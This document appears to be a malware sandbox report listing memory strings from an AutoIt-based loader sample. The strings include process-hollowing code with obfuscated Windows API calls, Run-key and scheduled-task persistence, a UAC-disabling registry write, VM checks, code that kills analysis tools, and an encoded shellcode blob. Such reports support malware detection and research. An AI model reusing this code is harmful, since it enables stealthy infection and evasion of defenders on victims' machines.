Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ivirtualsize = dllstructgetdata($timage_section_header, "unionofvirtualsizeandphysicaladdress") |
memstr_ecfab749-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $ivirtualsize and $ivirtualsize < $isizeofrawdata then $isizeofrawdata = $ivirtualsize |
memstr_8038deaf-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata(dllstructcreate("byte[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, dllstructgetdata(dllstructcreate("byte[" & $isizeofrawdata & "]", $ppointertorawdata), 1)) |
memstr_cb47521f-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $ivirtualaddress <= $paddressnewbasereloc and $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc then |
memstr_005a2846-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $trelocraw = dllstructcreate("byte[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress)) |
memstr_3f303aa5-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $frelocate then _runbinary_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523) |
memstr_222969d9-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "write" & "proces" & "smemo" & "ry", "handle", $handlerpro, "ptr", $pzeropoint, "ptr", $pmodule, "dword_ptr", $ioptionalheadersizeofimagenew, "dword_ptr*", 0) |
memstr_f5648c2b-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $tpeb = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid") |
memstr_c25ca4d7-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "rea"&"dproces"&"sme"&"mory", "ptr", $handlerpro, "ptr", $ppeb, "ptr", dllstructgetptr($tpeb), "dword_ptr", dllstructgetsize($tpeb), "dword_ptr*", 0) |
memstr_32dfe5c5-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "writep" & "roc" & "essmem" & "ory", "handle", $handlerpro, "ptr", $ppeb, "ptr", dllstructgetptr($tpeb), "dword_ptr", dllstructgetsize($tpeb), "dword_ptr*", 0) |
memstr_432ab3b0-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($tcontext, "e" & "ax", $pzeropoint + $ientrypointnew) |
memstr_b8a02692-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $hthread, "ptr", dllstructgetptr($tcontext)) |
memstr_4c017cd9-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)+2{ |
memstr_387e6752-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "dword", "resumethread", "handle", $hthread) |
memstr_14e12db1-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $handlerpro) |
memstr_210308b0-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func _runbinary_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64) |
memstr_86047cca-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $timage_base_relocation = dllstructcreate("dword virtualaddress; dword sizeofblock", $pdata + $irelativemove) |
memstr_df28795c-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ivirtualaddress = dllstructgetdata($timage_base_relocation, "vir"&"tual"&"add"&"ress") |
memstr_4c311be2-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $isizeofblock = dllstructgetdata($timage_base_relocation, "sizeofblock") |
memstr_30309b9b-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $tenries = dllstructcreate("word[" & $inumberofentries & "]", dllstructgetptr($timage_base_relocation) + 8) |
memstr_1f7134ee-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error then return seterror(1, 0, 0) |
memstr_02676aa6-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($bufferasm, 1, $asm) |
memstr_67465d44-c |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if bitshift($idata, 12) = $iflag then |
memstr_394b7fdd-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $taddress = dllstructcreate("ptr", $pmodule + $ivirtualaddress + bitand($idata, 0xfff)) |
memstr_c3cb89bb-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($taddress, 1, dllstructgetdata($taddress, 1) + $idelta) |
memstr_c6ddcff5-d |
Source: sdadbtvsh.bin, 00000008.00000003.1554858554.0000000001857000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 8___f3c3f786d6c2076657273696f6e3d223/2e302220656e636f64696e673d225554462d38222073746/6e646/6c6f6e653d22796573223f3e0d0*3c6/7373656d626c7920786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e763/22206d6/6e696665737456657273696f6e3d223/2e30223e0d0*20203c6/7373656d626c794964656e746974792076657273696f6e3d223/2e302e302e3022206e6/6d653d224d794/70706c69636/74696f6e2e6/7070222f3e0d0*20203c7472757374496e666f20786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e7632223e0d0*202020203c73656375726974793e0d0*2020202020203c72657/75657374656450726976696c6567657320786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e7633223e0d0*20202020202020203c72657/756573746564457865637574696f6e4c6576656c206c6576656c3d226/73496e766f6_6572222075694/63636573733d22666/6c7365222f3e0d0*2020202020203c2f72657/75657374656450726976696c656765733e0d0*202020203c2f73656375726974793e0d0*20203c2f7472757374496e666f3e0d0*3c2f6/7373656d626c793e0d0* |
memstr_0ef2abaa-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1542791644.00000000015B4000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \registry\machine\software\wow6432node\microsoft\windows\currentversion\run\registry\machine\software\wow6432node\microsoft\windows\currentversion\runh |
memstr_857d6f2b-d |
Source: sdadbtvsh.bin, 00000008.00000003.1542791644.00000000015B4000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: y\machine\software\microsoft\windows\currentversion\run |
memstr_6744e2c5-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ntversion\run", $key_vbsloader, "reg_sz", filegetshortname($dir3ctory_path & '\' & "update.vbs")) |
memstr_0d84108b-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: regwrite("hkcu64\software\microsoft\windows\currentversion\run", $key_vbsloader, "reg_sz", filegetshortname($dir3ctory_path & '\' & "update.vbs"))2 |
memstr_f52c04a3-e |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc |
memstr_c10617ab-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif47 |
memstr_c9cbbba2-f |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exitqk3 |
memstr_3e7068a9-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exit3a1 |
memstr_49572409-f |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif4t |
memstr_67e493fe-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc< |
memstr_9296181f-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif |
memstr_fb3860c1-a |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exitfv9 |
memstr_55cc2b71-c |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif! |
memstr_2c31b9a1-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif$h |
memstr_e4f339b3-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endifqpq |
memstr_f4491f02-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: elsec |
memstr_52429308-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exit048z |
memstr_18ac213e-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endif4z |
memstr_1020c105-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endifr |
memstr_174e3a32-e |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @comspec & ' /c ' & "schtasks /create /sc minute /mo 30 /tn " & $taskname & " /tr" & ' "' & filegetshortname($dir3ctory_path & "\" & $exec) & " " & filegetshortname($dir3ctory_path & "\" & $auex) & '"', "", @sw_hide) |
memstr_8d54621e-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: regwrite("hklm64\software\microsoft\windows\currentversion\policies\system", "enablelua", "reg_dword", "0") |
memstr_44f006be-e |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if processexists("vboxservice.exe") then2ji |
memstr_5eea811a-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if drivespacefree("d:\") < 1 and processexists("vmwareuser.exe") then |
memstr_1b8b0259-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if drivespacefree("d:\") < 1 and processexists("vmwareservice.exe") theng4 |
memstr_55e08284-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $startupkey = iniread($settingsfn, $ini_settings, "key", '').v |
memstr_1f510b0d-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(11, 0, 0)hku |
memstr_3a2c2218-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(10, 0, 0) |
memstr_1606ee7f-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(9, 0, 0)p0 |
memstr_93aa6083-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(7, 0, 0)q |
memstr_4cf25955-d |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(8, 0, 0) |
memstr_0f4aa0b9-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $binary = "" then exit4uu |
memstr_a78e2066-c |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("mshta.exe")e |
memstr_565e2a51-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return $inject_net4_regsvc |
memstr_cc47f09e-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return $inject_net2_regasm7] |
memstr_736e9aad-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(2, 0, 0) |
memstr_ae8c008e-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $short = "start.lnk" |
memstr_4af1ec03-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("regshot.exe") |
memstr_b260c18d-c |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $irunflag, $tcontext< |
memstr_abc9e610-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(6, 0, 0) |
memstr_d67318c4-d |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return $inject_net2_regsvc |
memstr_9ed801e5-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func denario($var92 = "-1") |
memstr_02cd08e8-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if not $frelocatable then |
memstr_966ff3db-e |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $context_full = 0x100007$ |
memstr_fca93851-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(101, 1, 0)2 |
memstr_2789c223-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $script = "start.vbs" |
memstr_e1e24ab3-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(101, 0, 0)l |
memstr_5092e576-d |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("taskmgr.exe") |
memstr_0daf4a7d-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func mainpe($executename) |
memstr_d8a50cab-a |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("procexp.exe") |
memstr_e42f5b83-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: winclose("process hacker")9- |
memstr_cf194dd0-f |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(3, 0, 0)2s3% |
memstr_cd6fb333-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(5, 0, 0) |
memstr_c2d7a7d6-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 9l%}5 |
memstr_fbb9d4c2-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return $inject_tw_u_nk_329l%}5 |
memstr_fcbb7977-b |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if winexists("tcpeye") then |
memstr_eeb8ca5e-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(4, 0, 0) |
memstr_5332d881-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return seterror(102, 0, 0) |
memstr_9deda46f-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: elseif $imagic = 523 thenqx |
memstr_56600da4-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("taskmgr.exe")m |
memstr_edfe7f0f-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: return $inject_net4_regasm |
memstr_5535a6dc-d |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: processclose("tcpeye.exe")y265yd95l6246 |
memstr_3db71ab8-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: rtup1 = regread("hkcu64\software\microsoft\windows\currentversion\runonce", $startupkey)l |
memstr_e82319ee-d |
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if $startup1 = $install_path & "\" & $install_fo |
memstr_990f6241-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_allocateexespaceataddress($handlerpro, $paddress, $isize)+ |
memstr_5412128e-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $acall = dllcall("kernel32.dll", "ptr", "virt"&"uala"&"llo"&"cex", "handle", $handlerpro, "ptr", $paddress, "dword_ptr", $isize, "dword", 0x1000, "dword", 64)) |
memstr_d9688e74-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $acall = dllcall("kernel32.dll", "ptr", "vi"&"rtualal"&"loc"&"ex", "handle", $handlerpro, "ptr", $paddress, "dword_ptr", $isize, "dword", 0x3000, "dword", 64)) |
memstr_a735e083-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $acall = dllcall("kernel32.dll", "ptr", "vir"&"tua"&"lalloc"&"ex", "handle", $handlerpro, "ptr", 0, "dword_ptr", $isize, "dword", 0x3000, "dword", 64) |
memstr_d8744225-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllcall("ntdll.dll", "int", "n"&"tunm"&"apviewo"&"fsection", "ptr", $handlerpro, "ptr", $paddress) |
memstr_d2aa3485-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $acall = dllcall("kernel32.dll", "bool", "iswow"&"64pr"&"oce"&"ss", "handle", $handlerpro, "bool*", 0) |
memstr_c0711567-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")/ |
memstr_ae777ec9-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)w |
memstr_393d9395-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ssssss = "/x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////"u |
memstr_04bc1b7e-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//"u |
memstr_acb16668-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "//8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//"u |
memstr_70936b45-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "//8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a"u |
memstr_0f052803-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////"u |
memstr_ec97cf0e-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8"u |
memstr_02b788e9-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4"u |
memstr_e6e021f4-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss &= "ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////" |
memstr_80a1a5f6-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @<xbo |
memstr_7e826959-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: g%(ao |
memstr_722a9c72-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: r332o |
memstr_c5312abf-e |
